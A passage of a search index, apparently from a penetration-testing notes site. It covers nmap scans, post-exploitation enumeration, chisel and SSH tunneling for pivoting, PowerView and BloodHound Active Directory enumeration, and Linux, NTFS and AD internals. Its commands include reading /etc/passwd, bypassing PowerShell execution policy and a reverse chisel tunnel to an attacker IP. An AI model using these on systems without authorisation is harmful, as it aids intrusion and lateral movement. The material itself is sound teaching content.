that the port is accessible. Finally, Nmap terminates the connection before it's finished by issuing an RST packet. This type of scan can also be specified using the -sS option. Note Despite its moniker, a SYN scan is no longer considered \"stealthy\" and is quite easily detected nowadays.","breadcrumbs":"Reconnaissance » Enumeration » Port Scanning » SYN Scan » SYN Scan","id":"20","title":"SYN Scan"},"200":{"body":"List files owned by a certain user in a directory: find -user 2>/dev/null List files owned by a certain user in a directory (without /proc): find -user 2>/dev/null | grep -v \"/proc\" List files owned by a certain group in a directory: find -group 2>/dev/null find -group 2>/dev/null | grep -v \"/proc\" # ignore /proc","breadcrumbs":"Post Exploitation » Enumeration » Linux » System Enumeration » File System Enumeration","id":"200","title":"File System Enumeration"},"201":{"body":"whoami id","breadcrumbs":"Post Exploitation » Enumeration » Linux » User Enumeration » Enumerate User Name and Group","id":"201","title":"Enumerate User Name and Group"},"202":{"body":"sudo -l","breadcrumbs":"Post Exploitation » Enumeration » Linux » User Enumeration » Enumerate Commands Runnable as Root","id":"202","title":"Enumerate Commands Runnable as Root"},"203":{"body":"cat /etc/passwd","breadcrumbs":"Post Exploitation » Enumeration » Linux » User Enumeration » List Users on the Machine","id":"203","title":"List Users on the Machine"},"204":{"body":"history","breadcrumbs":"Post Exploitation » Enumeration » Linux » User Enumeration » Get History of Commands the User Has Run","id":"204","title":"Get History of Commands the User Has Run"},"205":{"body":"Get a list of the network interfaces connected to the machine with their IPs and MACs: ip a Get a list of the machines that the victim has been interacting with (print the ARP table): ip neigh","breadcrumbs":"Post Exploitation » Enumeration » Linux » Network Enumeration » List Network Interfaces and Network Information","id":"205","title":"List Network Interfaces and Network Information"},"206":{"body":"netstat -ano","breadcrumbs":"Post Exploitation » Enumeration » Linux » Network Enumeration » List Open Ports","id":"206","title":"List Open Ports"},"207":{"body":"Plenty of automated tools can be found for enumerating Windows machines. They are a bit more diverse than those available for Linux - there are precompiled binaries (.exes) available, but there are also PowerShell scripts and many more.","breadcrumbs":"Post Exploitation » Enumeration » Windows » Introduction","id":"207","title":"Introduction"},"208":{"body":"WinPEAS is an incredible tool for enumerating Windows machines. It comes in two flavours - .bat and .exe. It doesn't really matter which one you are going to run - both will do the job just fine - however, the .exe file requires .Net version 4.5.2 or later to be installed on the machine. Enumerating system information: winpeas.exe systeminfo","breadcrumbs":"Post Exploitation » Enumeration » Windows » Windows Enumeration with WinPEAS","id":"208","title":"Windows Enumeration with WinPEAS"},"209":{"body":"systeminfo","breadcrumbs":"Post Exploitation » Enumeration » Windows » System Enumeration » Enumerate System Information","id":"209","title":"Enumerate System Information"},"21":{"body":"This is the default scan for nmap when it does not have elevated privileges. It initiates a full TCP connection and as a result can be slower. Additionally, it is also logged at the application level. This type of scan can also be specified via the -sT option.","breadcrumbs":"Reconnaissance » Enumeration » Port Scanning » TCP Connect Scan » TCP Connect Scan","id":"21","title":"TCP Connect Scan"},"210":{"body":"wmic qfe","breadcrumbs":"Post Exploitation » Enumeration » Windows » System Enumeration » Enumerate Patches","id":"210","title":"Enumerate Patches"},"211":{"body":"wmic logicaldisk get caption,description,providername","breadcrumbs":"Post Exploitation » Enumeration » Windows » System Enumeration » Enumerate Drives","id":"211","title":"Enumerate Drives"},"212":{"body":"Pivoting is the act of establishing access to internal resources on a network through a compromised machine. This allows an adversary to exifltrate local data which is usually not accessible from the outside world. Moreover, it permits the use of hacking tools as if they were running from inside the network.","breadcrumbs":"Post Exploitation » Pivoting » Introduction","id":"212","title":"Introduction"},"213":{"body":"Chisel is an open-source application for port tunneling. You can get it from https://github.com/jpillora/chisel. Clone the repo and follow the installation instructions. In order to port tunnel with chisel, you need to have a copy of the binary on both the attacking and the compromised machines.","breadcrumbs":"Post Exploitation » Pivoting » Tunneling with Chisel » Introduction","id":"213","title":"Introduction"},"214":{"body":"Run the following command on the attacking machine: chisel server -p [Listen Port] --reverse & This will setup a chisel server on Listen Port. On the compromised systenm run: chisel client [Attacker IP]:[Listen Port] R:[Local Host]:[Local Port]:[Remote Host]:[Remote Port] & This will endeavour to connect to a chisel server at the specified Attacker IP and Listen Port. Once it has connected to the remote chisel server, the chisel server will open Remote Port on the Remote Host and tunnel it to the Local Port of Local Host. From now on, any traffic sent to Remote Port on the Remote Host will be forwarded to the Local Port of Local Host. Chisel also defines some defaults for these values, which means you can omit some of them: Local Host - 0.0.0.0 Remote Host - 0.0.0.0 (server localhost) As an example, suppose you start a chisel server on your attacking machine (10.10.10.189) on port 1337, and want to gain access to port 3306 on the compromised machine. On the attacking machine you run: chisel server -p 1337 --reverse & On the compromised system you will run: chisel client 10.10.10.189:1337 R:localhost:3306:localhost:31337 & The above basically translates to \"Forward any traffic intended for port 31337 localhost on my attacking machine to port 3306 on the localhost of the compromised system\".","breadcrumbs":"Post Exploitation » Pivoting » Tunneling with Chisel » Creating a reverse tunnel","id":"214","title":"Creating a reverse tunnel"},"215":{"body":"SSH Tunneling is a port forwarding technique which uses SSH. It can be used to access internal resources within a network if you have SSH access to a host inside it. Additionally, the tunnel goes through a pre-existing SSH connection and can thus be utilised for bypassing firewalls.","breadcrumbs":"Post Exploitation » Pivoting » SSH Tunneling » Introduction","id":"215","title":"Introduction"},"216":{"body":"Local port forwarding is used when you want to create a bridge to a port that hosts an internal service which does not accept connections from outside the network. For this to work, you need to specify two ports - one for the service on the remote machine which you want to access and one on your local machine to create the listener on. Any packets sent to your machine on the local port will be tunneled to the port on the remote machine through the SSH connection. Whilst you will still receive any responses to requests you send through the tunnel, you won't be able to receive arbitrary data that gets sent to the remote port. The syntax is fairly simple: ssh -L [LOCAL_IP:]LOCAL_PORT:DESTINATION:DESTINATION_PORT SSH_SERVER [LOCAL_IP:] - the interface you want to open the listener on. This can be omitted and defaults to localhost. LOCAL_PORT - the port you want to start the listener on. Any traffic sent to this port will be forwarded through the tunnel. DESTINATION - the destination host. This does not need to (and most likely won't) match SSH_SERVER, since you are now trying to access an internal resource. DESTINATION_PORT - the port on the remote machine, that you want to access through the tunnel. You can also add -N -f to the above command, so that ssh runs in the background and only opens the tunnel without giving an interface for typing commands. We have now established a tunnel on my Kali machine's port 8080, which will forward any traffic to 192.168.129.137:1337, which is my ubuntu server. So let's see if we can access the web page. Wait, what? We just created the tunnel, but it does not seem to work? Well, remember how the DESTINATION does not need to match the server's IP? This is because the DESTINATION is where the traffic is sent after it gets to the remote machine. In a sense, the remote machine is now the sender and not us. Therefore, in order to access a resource internal to the network, we would need to change DESTINATION to something like localhost or another computer's IP. Let's again check to see if we have access to the resource hidden behind localhost:1337 on the Ubuntu server...","breadcrumbs":"Post Exploitation » Pivoting » SSH Tunneling » Local Port Forwarding","id":"216","title":"Local Port Forwarding"},"217":{"body":"Remote port forwarding is sort of the reverse of local port forwarding. A tunnel is opened and any traffic sent to the tunnel port on the remote machine will be forwarded to the local machine. In the exact same way as above, once the traffic is tunneled, the local machine becomes the sender. Therefore, remote port forwarding is more useful when you want to receive traffic from inside the network, rather than injecting it. You will be able to actively receive any data that is sent to the remote port, but you won't be able to send arbitrary data through the tunnel yourself. The syntax is also very similar: ssh -R [REMOTE:]REMOTE_PORT:DESTINATION:DESTINATION_PORT SSH_SERVER [REMOTE:] - the remote host to listen on. This resembles the LOCAL_IP when local port forwarding and can be omitted. If left empty, the remote machine will bind on all interfaces REMOTE_PORT - the port on the remote machine that is part of the tunnel. DESTINATION:DESTINATION_PORT - the host and port that the traffic should be sent to once it gets from the remote machine back to the local machine Once again, you can add -N -f to the command, so that ssh runs in the background and only opens the tunnel without giving an interface for typing commands.","breadcrumbs":"Post Exploitation » Pivoting » SSH Tunneling » Remote Port Forwarding","id":"217","title":"Remote Port Forwarding"},"218":{"body":"","breadcrumbs":"Post Exploitation » Active Directory (AD) » Active Directory (AD)","id":"218","title":"Active Directory (AD)"},"219":{"body":"PowerView is a PowerShell tool for the enumeration of Windows domains. The script can be downloaded from https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1. Before running, you need to bypass PowerShell's execution policy: powershell -ep bypass Load the script using . .\\PowerView.ps1 Normally, you'd be running these commands through some sort of shell, but for the sake of simplicity, I will show them all run locally.","breadcrumbs":"Post Exploitation » Active Directory (AD) » Domain Enumeration with PowerView » Overview","id":"219","title":"Overview"},"22":{"body":"These scan types make use of a small loophole in the TCP RFC to differentiate between open and closed ports. RFC 793 dictates that \"if the destination port state is CLOSED .... an incoming segment not containing a RST causes a RST to be sent in response.” It also says the following about packets sent to open ports without the SYN, RST, or ACK bits set: “you are unlikely to get here, but if you do, drop the segment, and return\". Scanning systems compliant with this RFC text, any packet not containing SYN, RST, or ACK bits will beget an RST if the port is closed and no response at all if the port is open. So long as none of these flags are set, any combination of the other three (FIN, PSH, and URG) is fine. These scan types can sneak through certain non-stateful firewalls and packet filtering routers and are a little more stealthy than even a SYN scan. However, not all systems are compliant with RFC 793 - some send a RST even if the port is open. Some operating systems that do this include Microsoft Windows, a lot of Cisco devices, IBM OS/400, and BSDI. These scans will work against most Unix-based systems. It is not possible to distinguish an open from a filtered port with these scans, hence why the port states will be open|filtered.","breadcrumbs":"Reconnaissance » Enumeration » Port Scanning » FIN, NULL & XMAS Scans » Overview","id":"22","title":"Overview"},"220":{"body":"Get-NetDomain","breadcrumbs":"Post Exploitation » Active Directory (AD) » Domain Enumeration with PowerView » Get Domain Information","id":"220","title":"Get Domain Information"},"221":{"body":"Get-NetDomainController","breadcrumbs":"Post Exploitation » Active Directory (AD) » Domain Enumeration with PowerView » Get Domain Controller Information","id":"221","title":"Get Domain Controller Information"},"222":{"body":"Get-DomainPolicy You can also get information about a specific policy with the following syntax: (Get-DomainPolicy).\"policy name\"","breadcrumbs":"Post Exploitation » Active Directory (AD) » Domain Enumeration with PowerView » Retrieve Domain Policy Information","id":"222","title":"Retrieve Domain Policy Information"},"223":{"body":"Get-NetUser The output of this command is rather messy, but you can pull specific information with the following syntax: Get-NetUser | select However, there is an even better way to do that.","breadcrumbs":"Post Exploitation » Active Directory (AD) » Domain Enumeration with PowerView » Get Users Information","id":"223","title":"Get Users Information"},"224":{"body":"Get a specific properties of all the users: Get-DomainUser -Properties ,,... It is useful to always have the samaccountname as the first property selected, so that you can easily match properties with specific users.","breadcrumbs":"Post Exploitation » Active Directory (AD) » Domain Enumeration with PowerView » Get User Property Information","id":"224","title":"Get User Property Information"},"225":{"body":"Get-DomainComputer | select samaccountname, operatingsystem","breadcrumbs":"Post Exploitation » Active Directory (AD) » Domain Enumeration with PowerView » Get Domain Machines","id":"225","title":"Get Domain Machines"},"226":{"body":"Get-NetGroup | select samaccountname, admincount, description","breadcrumbs":"Post Exploitation » Active Directory (AD) » Domain Enumeration with PowerView » Get Groups","id":"226","title":"Get Groups"},"227":{"body":"Get-NetGPO | select ,,...","breadcrumbs":"Post Exploitation » Active Directory (AD) » Domain Enumeration with PowerView » Get Group Policy Information","id":"227","title":"Get Group Policy Information"},"228":{"body":"https://book.hacktricks.xyz/windows/basic-powershell-for-pentesters/powerview","breadcrumbs":"Post Exploitation » Active Directory (AD) » Domain Enumeration with PowerView » Additional Resources","id":"228","title":"Additional Resources"},"229":{"body":"Bloodhound is a tool used for finding relationships and patterns within data from an Active Directory environment. It is run on the attacker's machine and accessed through a web interface. Bloodhound operates on data and this data comes from a collector which is executed on the target machine.","breadcrumbs":"Post Exploitation » Active Directory (AD) » Domain Data Enumeration with Bloodhound » Overview","id":"229","title":"Overview"},"23":{"body":"Doesn't set any flags. Since null scanning does not set any set flags, it can sometimes penetrate firewalls and edge routers that filter incoming packets with certain flags. It is invoked with the -sN option:","breadcrumbs":"Reconnaissance » Enumeration » Port Scanning » FIN, NULL & XMAS Scans » Null Scan","id":"23","title":"Null Scan"},"230":{"body":"Install Bloodhound sudo apt install bloodhound Configure neo4j - Bloodhound relies on a different tool called neo4j. It is best to change its default credentials. run neo4j sudo neo4j console open the link it gives you and use the credentials neo4j:neo4j to login change the password","breadcrumbs":"Post Exploitation » Active Directory (AD) » Domain Data Enumeration with Bloodhound » Setup","id":"230","title":"Setup"},"231":{"body":"Data is obtained through a collector. There are different ones available. You can get SharpHound from the Bloodhound GitHub repo - https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.ps1. Start neo4j and bloodhound: sudo neo4j console sudo bloodhound Run the collector on the target machine: powershell -ep bypass . .\\SharpHound.ps1 Invoke-BloodHound -CollectionMethod All -Domain -ZipFileName Now, move the files to the attacker machine.","breadcrumbs":"Post Exploitation » Active Directory (AD) » Domain Data Enumeration with Bloodhound » Collecting Data for Bloodhound","id":"231","title":"Collecting Data for Bloodhound"},"232":{"body":"In Bloodhound, on the right you should see a button for Upload Data. Select the previously obtained zip file and wait for Bloodhound to process it. In the top left, click on the three dashes and you should see a summary of the data imported:","breadcrumbs":"Post Exploitation » Active Directory (AD) » Domain Data Enumeration with Bloodhound » Viewing the Data","id":"232","title":"Viewing the Data"},"233":{"body":"Through the analysis tab, you can see a bunch of pre-made queries. Their names are usually self-describing. Clicking on any of them will generate a particular graph expressing a specific relationship within the AD environment: You are also able to create custom queries.","breadcrumbs":"Post Exploitation » Active Directory (AD) » Domain Data Enumeration with Bloodhound » Finding Relationships in the Data","id":"233","title":"Finding Relationships in the Data"},"234":{"body":"","breadcrumbs":"System Internals","id":"234","title":"System Internals"},"235":{"body":"","breadcrumbs":"System Internals » Linux","id":"235","title":"System Internals"},"236":{"body":"","breadcrumbs":"System Internals » Linux » Processes » User ID","id":"236","title":"User ID"},"237":{"body":"Linux uses a unified file system which begins at the / directory (pronounced \"root\", notwithstanding this unfortunate naming). Directory Description / The anchor of the file system. Pronounced \"root\". /root The home directory of the root user. /home The home directories of non-root users are stored here. /usr All system files are stored here - the U nix S ystem R esource. /etc Stores configuration files. /var Stores variable data files such as logs, caches, etc. /opt Any additional software which is not built-in should be installed here. /tmp Temporary data storage. Its contents are erased at every boot or at a certain period. /proc Runtime process information.","breadcrumbs":"System Internals » Linux » File System » Unified File System","id":"237","title":"Unified File System"},"238":{"body":"A symbolic, or soft , link is a reference in the file system to a particular file. When the symbolic link is used in a command, the file which it references will be used instead. Symbolic links between files (or directories for that matter) can be created by using the following command: ln -s It is important to note that when using relative paths for the link, the path is relative to the link (even after it is moved) and not the current working directory. Essentially, when creating a link with a relative path, the link points to ./file. However, if the link is moved, then ./ will refer to a different directory and the link won't be able to find what it is referencing.","breadcrumbs":"System Internals » Linux » File System » Symbolic Links","id":"238","title":"Symbolic Links"},"239":{"body":"Hard links are different from the symbolic links in the sense that they do not have any relationship to the original path where they link to, but only to its contents. They are just files which reference the same data as another file. Hard links are created by using the following syntax: ln Because hard links bear no connection to the path they were created with, they will still point to the same data even after they are relocated.","breadcrumbs":"System Internals » Linux » File System » Hard Links","id":"239","title":"Hard Links"},"24":{"body":"Sets just the FIN bit to on. It is invoked with -sF:","breadcrumbs":"Reconnaissance » Enumeration » Port Scanning » FIN, NULL & XMAS Scans » FIN Scan","id":"24","title":"FIN Scan"},"240":{"body":"Every file and directory in Linux is owned by a certain user and a group and is assigned three sets of permissions - owner, group, and all users. The owner permissions describe what the user owning the file can do with it, the group permissions describe what members of the group owning the file can do with it, and the all users permissions describe what the rest of the non-root (root is allowed everything) users which are not members of the file's group can do with it. There are 3 possible type of permissions - read (r), write (x) and execute (x). Regarding the file shown here, the permissions are shown on the left and are represented by every 3 characters after the initial dash (-). So, here the file's owner (cr0mll) has rwx permissions on it. Every member of the sysint group will have rw permissions on the file and all other users will only be able to read it.","breadcrumbs":"System Internals » Linux » File System » Permissions","id":"240","title":"Permissions"},"241":{"body":"The Set Owner User ID (SUID) is a special permission which can be set on executable files. When a file with SUID set is executed, it will always run with the effective UID of the user who owns it, irrespective of which user actually passed the command (so long as the user invoking the command also has execute permissions on the file). The SUID permission is indicated by replacing the x in the permissions of the owning user with s. Setting SUID on a file can be done with the following command: chmod u+s Note The SUID permission on scripts is ignored.","breadcrumbs":"System Internals » Linux » File System » Set Owner User ID (SUID)","id":"241","title":"Set Owner User ID (SUID)"},"242":{"body":"Similarly to SUID, the Set Group ID (SGID) is a special permission which can be set on both executable files and directories. When set on files, it behaves in the same way SUID but rather than the files executing with the privileges of the owning user, they execute with the effective GID the owning group. When set on a directory, any file created within that directory will automatically have their group ownership set to one specified by the folder. Setting SGID on a file can be done with the following command: chmod g+s Note The SGID permission on scripts is ignored.","breadcrumbs":"System Internals » Linux » File System » Set Group ID (SGID)","id":"242","title":"Set Group ID (SGID)"},"243":{"body":"The sticky bit is a special permission which can be applied to directories in order to limit file deletion within them to the owners of the files. It is denoted by a t in the place of the x permission for the directory and can be set with the following command: chmod +t ","breadcrumbs":"System Internals » Linux » File System » Sticky Bit","id":"243","title":"Sticky Bit"},"244":{"body":"The command line, is a text-based interface which allows for interaction with the computer and execution of commands. The actual command interpreter which carries out the commands is referred to as the shell and there are multiple examples of shells such as bash, zsh, sh, etc.","breadcrumbs":"System Internals » Linux » Command Line » Introduction","id":"244","title":"Introduction"},"245":{"body":"It is possible to redirect input and output from and to files when invoking commands: Redirection Description < in_file Redirect in_file into the command's standard input. > out_file Redirect the command's standard output into out_file by overwriting it. >> out_file Redirect the command's standard output into out_file by appending to it. > err_file Redirect the command's standard error into err_file by overwriting it. >> err_file Redirect the command's standard error into err_file by appending to it.","breadcrumbs":"System Internals » Linux » Command Line » Input and Output Redirection","id":"245","title":"Input and Output Redirection"},"246":{"body":"Moreover, information may be redirected directly from one command to another by using unnamed pipes (|).","breadcrumbs":"System Internals » Linux » Command Line » Pipes","id":"246","title":"Pipes"},"247":{"body":"","breadcrumbs":"System Internals » Windows","id":"247","title":"System Internals"},"248":{"body":"Active Directory (AD) is a directory service for Windows network environments. It allows an organisation to store directory data and make it available to the users in a given network. AD has a distributed hierarchical structure that allows for the management of an organisation's resources such as users, computers, groups, network devices, file shares, group policies, servers, workstations and trusts. Furthermore, it provides authentication and authorization functionality to Windows domain environments. Essentially, AD is a large database of information which is accessible to all users within a domain, irrespective of their privilege level. This means that a standard user account can be used to enumerate a large portion of all AD components.","breadcrumbs":"System Internals » Windows » Active Directory (AD) » Introduction","id":"248","title":"Introduction"},"249":{"body":"Resources in Active Directory are represented by objects. An object is any resource present within Active Directory such as OUs, printers, users, domain controllers, etc. Every object has a set of characteristic attributes which describe it. For example, a computer object has attributes such as hostname and DNS name. Additionally, all AD attributes are associated with an LDAP name which can be used when performing LDAP queries. Every object carries information in these attributes, some of which are mandatory and some optional. Objects can be instantiated with a predefined set of attributes from a class in order to make the process of object creation easier. For example, the computer object PC1 will be an instance of the computer class in Active Directory. It is common for objects to contain other objects, in which case they are called containers . An object holding no other objects is known as a leaf .","breadcrumbs":"System Internals » Windows » Active Directory (AD) » Objects","id":"249","title":"Objects"},"25":{"body":"Sets the FIN, PSH, and URG flags, lighting the packet up like a Christmas tree. It is performed through the -sX option:","breadcrumbs":"Reconnaissance » Enumeration » Port Scanning » FIN, NULL & XMAS Scans » Xmas Scan","id":"25","title":"Xmas Scan"},"250":{"body":"Objects are organised in logical groups called domains . These can further have nested subdomains in them and can either operate independently or be linked to other domains via trust relationships. A root domain together with all of its subdomains and nested objects is known as a tree . A collection of trees is referred to as a forest (really???). It is the root container for all objects in a given AD environment. Following is an example forest with a single tree: COMPANY.LOCAL/\n├─ ADMIN.COMPANY.LOCAL\n│ ├─ GPOs\n│ ├─ OUs\n│ │ ├─ EMPLOYEES\n│ │ │ ├─ COMPUTERS\n│ │ │ │ ├─ PC1\n│ │ │ ├─ USERS\n│ │ │ │ ├─ jdoe\n│ │ │ ├─ GROUPS\n│ │ │ │ ├─ STAFF\n├─ DEV.COMPANY.LOCAL\n├─ MAIL.COMPANY.LOCAL","breadcrumbs":"System Internals » Windows » Active Directory (AD) » Object Organisation","id":"250","title":"Object Organisation"},"251":{"body":"The full path to an object in AD is specified via a Distinguished Name (DN) . A Relative Distinguished Name (RDN) is a single component of the DN that separates the object from other objects at the current level in the naming hierarchy. RDNs are represented as attribute-value pairs in the form attribute=value, typically expressed in UTF-8. A DN is simply a comma-separated list of RDNs which begins with the top-most hierarchical layer and becomes more specific as you go to the right. For example, the DN for the John Doe user would be dc=local,dc=company,dc=admin,ou=employees,ou=users,cn=jdoe. The following attribute names for RDNs are defined: LDAP Name Attribute DC domainComponent CN commonName OU organizationalUnitName O organizationName STREET streetAddress L localityName ST stateOrProvinceName C countryName UID userid It is also important to note that the following characters are special and need to be escaped by a \\ if they appear in the attribute value: Character Description space or # at the beginning of a string space at the end of a string , comma + plus sign \" double quotes \\ backslash / forwards slash < left angle bracket > right angle bracket ; semicolon LF line feed CR carriage return = equals sign","breadcrumbs":"System Internals » Windows » Active Directory (AD) » Distinguished Name (DN) & Relative Distinguished Name (RDN)","id":"251","title":"Distinguished Name (DN) & Relative Distinguished Name (RDN)"},"252":{"body":"Trusts in Active Directory allow for forest-forest or domain-domain links. They allow users in one domain to access resources in another domain where their account does not reside. The way they work is by linking the authentication systems between two domains. The two parties in a trust do not necessarily have the same capabilities with respect to each other: One-way trusts allow only one party to access the resources of the other. The trusted domain is considered the one accessing the resources and the trusting domain is the one providing them. Two-way trusts allow the parties to mutually access each other's resources. Additionally, trusts can either be transitive or non-transitive. Transitivity means that the trust relationship is propagated upwards through a domain tree as it is formed. For example, a transitive two-way trust is established between a new domain and its parent domain upon creation. Any children of the new domain (grandchildren of the parent domain) will also then share a trust relationship with the master parent. Five possible types of trusts can be discerned depending on the relationships between the systems being linked: Trust Description Parent-child A two-way transitive relationship between a parent and a child domain. Cross-link A trust between two child domains at the same hierarchical level, which is used to speed up authentication. External A non-transitive trust between two separate domains in separate forests which are not already linked by a forest trust. Tree-root A two-way transitive trust between a forest root domain and a new tree root domain. Forest A transitive trust between two forest root domains in separate forests.","breadcrumbs":"System Internals » Windows » Active Directory (AD) » Trusts","id":"252","title":"Trusts"},"253":{"body":"A contact in AD contains information about an external person or company that may need to be contacted on a regular basis. Contact objects are instances of the Contact class and are considered leaf objects. Their attributes include first name, last name, email address, telephone number, etc. Contacts are not security principals - they lack a SID and only have a GUID.","breadcrumbs":"System Internals » Windows » Active Directory (AD) » Contacts » Introduction","id":"253","title":"Introduction"},"254":{"body":"Security Principal - any object which can be authenticated by the operating system, such as user or computer accounts, or a thread/process running in the security context of a user or computer account, or the security groups for these accounts. Security Identifier (SID) - a unique identifier which identifies a security principal/group. Every security principal has its own unique SID, which is issued by the domain controller and stored in a security database.","breadcrumbs":"System Internals » Windows » Active Directory (AD) » Terminology","id":"254","title":"System Internals"},"255":{"body":"A user in AD stores information about an employee or contractor who works for the organisation. These objects are instances of the User class . User objects are leaf objects, since they do not contain any other objects. Every user is considered a security principal and has its own SID and GUID. Additionally, user objects can have numerous different attributes such as display name, email address, last login time, etc - well in excess of 800.","breadcrumbs":"System Internals » Windows » Active Directory (AD) » Users » Introduction","id":"255","title":"Introduction"},"256":{"body":"Domain Users in AD are the ones who are capable of accessing resources in the Active Directory environment. These users can log into any host on the network. All domain users have 5 essential naming attributes as well as many others: Attribute Description UserPrincipalName (UPN) The primary logon name for the user, which uses the user's email by convention. ObjectGUID A unique identifier for the user which is never changed even after removal of the user. SAMAccountName A logon name providing support for previous versions of Windows. objectSID The user's security identifier (SID) which identifies the user and their group memberships. sIDHistory A history of the user's SIDs which keeps track of the SIDs for the user when they migrate from one domain to another.","breadcrumbs":"System Internals » Windows » Active Directory (AD) » Users » Domain Users","id":"256","title":"Domain Users"},"257":{"body":"Groups are instances of the AD Group class. They provide the means to mass assign permissions to users, making administration a lot easier. The administrator assigns a set of privileges to the group and they will be inherited by any user who joins it. Groups have two essential characteristics - type and scope.","breadcrumbs":"System Internals » Windows » Active Directory (AD) » Groups » Introduction","id":"257","title":"Introduction"},"258":{"body":"The group type identifies the group's purpose and must be chosen upon creation of the group. There are two types of groups. Security groups are best suited precisely for the purpose described above - mass assignment of permissions to users. Distributions groups are a bit different - they are unable to assign any permissions and are really only used by email applications for the distribution of messages to their members. They resemble mailing lists and can be auto-filled in the recipient field when sending emails using Microsoft Outlook.","breadcrumbs":"System Internals » Windows » Active Directory (AD) » Groups » Group Type","id":"258","title":"Group Type"},"259":{"body":"There are three possible group scopes and once again must be selected upon creation of the group. The group scope determines the level of permissions that can be assigned via the group. Domain Local groups can only be used to manage permissions only regarding resources within the domain that the group belongs to. Whilst such groups cannot be used in other domains, they can contain users from other domains. Additionally, nesting of domain local groups is allowed within other domain local groups but not within global ones. Global groups allow access to resources in a different domain from the one they belong to, although they may only contain users from their origin domain. Nesting of global groups is allowed both in other global groups and local groups. Universal groups allow permissions management across all domains within the same forest. They are stored in the Global Catalog and any change made directly to them triggers forest-wide replication. To avoid unnecessary replications, administrators are advised to keep users and computers in global groups which are themselves stored in universal groups. It is also possible to change the scope of a group under certain conditions: A global group can be promoted to a universal group if it is not part of another global group. A domain local group can be promoted to a universal group if it does not contain any other domain local groups. A universal group can be demoted to a global group if it does not contain any other universal groups. A universal group can be freely demoted to a domain local group.","breadcrumbs":"System Internals » Windows » Active Directory (AD) » Groups » Group Scope","id":"259","title":"Group Scope"},"26":{"body":"Web servers usually run on port 80 or 443 depending on whether they run HTTP or HTTPS. Version information about the underlying web server application can be obtained via nmap using the -sV option. nmap -p80,443 -sV We can also use the http-enum NSE script which will perform some basic web server enumeration for us: nmap -p80 --script=http-enum Note Web servers are also commonly set up on custom ports, but one can enumerate those in the same way.","breadcrumbs":"Reconnaissance » Enumeration » Web Server Enumeration (80, 443) » Obtaining Version Information","id":"26","title":"Obtaining Version Information"},"260":{"body":"Some built-in groups are automatically created when an AD environment is set up. These groups have specific purposes and cannot contain other groups - only users. Group Name Description Account Operators Management of most account types with the exception of the Administrator account, administrative user accounts, or members of the Administrators, Server Operators, Account Operators, Backup Operators, or Print Operators groups. Additionally, members can log in locally to domain controllers. Administrators Full access to a computer or an entire domain provided that they are in this group on a domain controller. Backup Operators Ability to back up or restore all files on a computer, irrespective of the permissions set on it; ability to log on and shut down the computer; ability to log on domain controllers locally; ability to make shadow copies of SAM/NTDS databases. DnsAdmins Access to DNS network information. Only created if the DNS server role is installed at some point on a domain controller. Domain Admins Full permissions to administer the domain; local administrators on every domain-joined machine. Domain Computers Stores all computers which are not domain controllers. Domain Controllers Stores all domain controllers in the domain. Domain Guests Includes the built-in Guest account. Domain Users Stores all users in the domain. Enterprise Admins Complete configuration access within the domain; ability to make forest-wide changes such as creating child domains and trusts; only exists in root domains. Event Log Readers Ability to read event logs on local computers. Group Policy Creator Owners Management of GPOs in the domain. Hyper-V Administrators Complete access to all Hyper-V features. IIS_IUSRS Used by IIS. Pre–Windows 2000 Compatible Access Provides backwards-compatibility with Windows NT 4.0 or earlier. Print Operators Printer management; ability to log on to DCs and load printer drivers. Protected Users Provides additional protection against attacks such as credential theft or Kerberoasting. Read-Only Domain Controllers Contains all read-only DCs in the domain. Remote Desktop Users Ability to connect to a host via RDP. Remote Management Users Schema Admins Ability to modify the AD schema. Server Operators Ability to modify services, SMB shares and backup files on domain controllers.","breadcrumbs":"System Internals » Windows » Active Directory (AD) » Groups » Default Groups","id":"260","title":"Default Groups"},"261":{"body":"Domain Controllers (DCs) are at the heart of Active Directory. There are Flexible Single Master Operation (FSMO) roles which can be assigned separately to domain controllers in order to avoid conflicts when data is update in the AD environment. These roles are the following: Role Description Schema Master Management of the AD schema. Domain Naming Master Management of domain names - ensures that no two domains in the same forest share the same name. Relative ID (RID) Master Assignment of RIDs to other DCs within the domain, which helps to ensure that no two objects share the same SID. PDC Emulator The authoritative DC in the domain - responds to authentication requests, password changes, and manages Group Policy Objects (GPOs). Additionally, it keeps track of time within the domain. Infrastructure Master Translation of GUIDs, SIDs, and DNs between domains in the same forest.","breadcrumbs":"System Internals » Windows » Active Directory (AD) » Domain Controllers » Introduction","id":"261","title":"Introduction"},"262":{"body":"A computer object is an instance of the Computer class in Active Directory and represents a workstation or server connected to the AD network. Computer objects are security principals and therefore have both a SID and GUID. These are prime targets for adversaries, since full administrative access to a computer (NT AUTHORITY\\SYSTEM) grants privileges similar to those of a standard domain user and can be used to enumerate the AD environment.","breadcrumbs":"System Internals » Windows » Active Directory (AD) » Computers » Introduction","id":"262","title":"Introduction"},"263":{"body":"Windows uses the New Technology File System (NTFS) for managing its files and folders. What makes it special is its ability to automatically repair files and folders on disk using log files in case of a failure. Additionally, it lifts certain limitations which were characteristic of its predecessors by supporting files larger than 4GB, being able to set permissions on specific files and folders and being able to avail itself of both compression and encryption. Another peculiar feature of NTFS are Alternate Data Streams .","breadcrumbs":"System Internals » Windows » File System » Introduction","id":"263","title":"Introduction"},"264":{"body":"NTFS allows for every user/group to have its own set of permissions on every file and folder in the file system tree. The following six types of permissions can be set: Permission On Files On Folders Read View or access the file's contents. View and list files and subfolders. Write Write to the file. Add files or subfolders. Read & Execute View or access the file's contents as well as execute the file. View and list files and subfolders as well as execute files. Inherited by both files and folders. List Folder Contents N/A View and list files and subfolders as well as execute files. Inherited only by folders. Modify Read and write to the file, or delete it. Read and write to files and subfolders, or delete the folder. Full Control Read, write, change or delete the file. Read, write, change or delete files and subfolders.","breadcrumbs":"System Internals » Windows » File System » Permissions","id":"264","title":"Permissions"},"265":{"body":"Permissions can be inspected from the command line by running icacls The last set of () for each user/group tell you the permissions: F - Full Control M - Modify RX - Read & Execute R - Read W - Write Additionally, the permissions on a file/folder can be inspected by right-clicking on the item in Windows Explorer, following Properties->Security and then selecting the user/group you want to see the permissions for.","breadcrumbs":"System Internals » Windows » File System » Inspecting Permissions","id":"265","title":"Inspecting Permissions"},"266":{"body":"A not very well-known, yet interesting feature of NTFS are the so-called Alternate Data Streams. These were implemented for better Macintosh file support, but they can lead to security vulnerabilities and ways to hide data. A data stream can be thought of as a file within another file. Each stream has its own allocated disk space, size and file locks. Moreover, alternate data streams are invisible to Windows Explorer which 